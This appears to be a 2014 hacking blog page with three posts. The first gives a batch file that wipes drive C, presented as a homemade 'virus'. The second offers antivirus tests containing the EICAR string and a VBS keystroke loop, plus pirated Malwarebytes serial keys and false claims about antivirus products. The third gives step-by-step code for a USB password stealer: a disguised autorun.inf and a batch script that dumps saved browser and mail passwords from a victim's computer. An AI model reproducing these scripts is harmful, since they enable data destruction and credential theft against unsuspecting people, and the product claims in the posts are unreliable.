.

get our extension
Showing posts with label Batch Programs. Show all posts
Showing posts with label Batch Programs. Show all posts

Sunday, 26 October 2014

Make Deadly Virus In Notepad

BY Unknown IN , 1 comment


Make Dangerous Virus By Yourself !
You Know you can also make a virus, surprised ? Yes ! You can create virus, its very easy. Actually its not a virus, but command that can be run by Command Prompt (cmd).

What Do You Need ?
Nothing just a notepad, little mind and a bit of codes !
So Lets start !
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of Drive C.

There you see in code I wrote "Del C:\" , If we replace this "C" with any other letter , it will probably format and destroy data in that particular drive. 


CAUTION !

Do not try this on your or someone else computer, It will delete and format Drive C , D, E, F, etc , anyone you mentioned while coding !

Disclaimer !
The above tutorial is for educational purpose only. You will be held responsile for any damage you make. 

Monday, 13 October 2014

How To Check Anti-Virus Strength-Best Antivirus ?

BY Unknown IN , , 3 comments


Which Antivirus Has Good Strength?

                                     OR
                        Which One Is Best Antivirus ?

This post is for those peoples who want to check their antivirus program strength. This is a standard test and if your antivirus passes this test then assume that it’s a good antivirus.
Some says that Kaspersky is best and other says Norton is best and so on…
But the thing is that if your antivirus passes this test it is confirmed that it is a good antivirus.
Method 1) :    To Test Your Antivirus Strength:-
First open NOTEPAD.
Then copy and paste this code in NOTEPAD:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Then save the file with name VIRUS.exe
as soon as the file is saved, your Antivirus must alert you about a severe potential threat detected on your computer.
If it does, then your Anti-Virus Program is genuine and working .
If it does not, then your Anti-Virus program is fake and overall your system is not secured.

Method 2) : There is also an alternative way to check your Anti-Virus strength:-
Open Notepad and
Paste the Following code –>
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “This is a Virus. You have been infected.”
loop
You can replace “This is a Virus” with Any Text.
Save it as AntivirusTest.VBS
Once again, as soon as the file is saved, your Antivirus must alert you about a severe potential threat detected on your computer.
I prefer to use
MICROSOFT SECURITY ESSENTIALS
or
MALWAREBYTES ANTI-MALWARE
because these two are the Best and Free of cost Antivirus by the Microsoft Corporation®
and
©2013 Malwarebytes Corporation.
Here are some MALWAREBYTES ANTI-MALWARE SERIAL KEYS for ACTIVATION
ID and Serial.ID: 7MT93
Serial: WDM7-35LM-XHP5-8QE0
ID: 6SW32
Serial: AA8U-7KLB-HKV2-8RJX
ID: 3ER93
Serial: X0LQ-R3L1-PD7B-8RY3
ID: 3PQ44
Serial: NCUD-A3CA-Y55L-EBTF
ID: 1XK64
Serial: XY07-PED0-BF01-P5WC
ID: 9EF12
Serial: L1MF-0QYX-E3H8-CUW2
ID: 1BX13
Serial: A88F-0AM7-7E8U-VFHH
ID: 1SH78
Serial: 38PN-FQ2E-9T65-1QP5
ID: 1KV77
Serial: BAQA-1U1U-U9GB-PCY0
ID: 4VH13
Serial: NMKE-0KYP-K86P-AMQA
ID: 6KP11
Serial: NYYN-7B2V-H22N-YVQD

Sunday, 3 August 2014

USB Password Stealer

BY Unknown IN , , , , No comments



There's a lot of people in the world and even more online accounts. Every security system has a flaw and what we're going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to "recover" saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What's quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to "Show Saved Paswords" in the options menu. We're going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you'll learn in this tutorial. So, with a goal in mind and not a second to spare, let's start right away.




Things you will need (See link below):-




MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.




Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc




IE Passview - IE passview is another small program that helps us view stored passwords in Internet explorer.




Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.




Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I've tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)




So that's that and now we are ready to create a USB password stealer.

Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course ;-)




1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any])




2. Create a new Notepad and write the following text into it:










[autorun]

open=launch.bat

ACTION= Perform a Virus Scan




Save the Notepad and rename it from New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.




3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.)

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt




Save the Notepad and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.




These were simple commands to start up our password "recovering" programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.




Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it's magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work.

See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.

This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.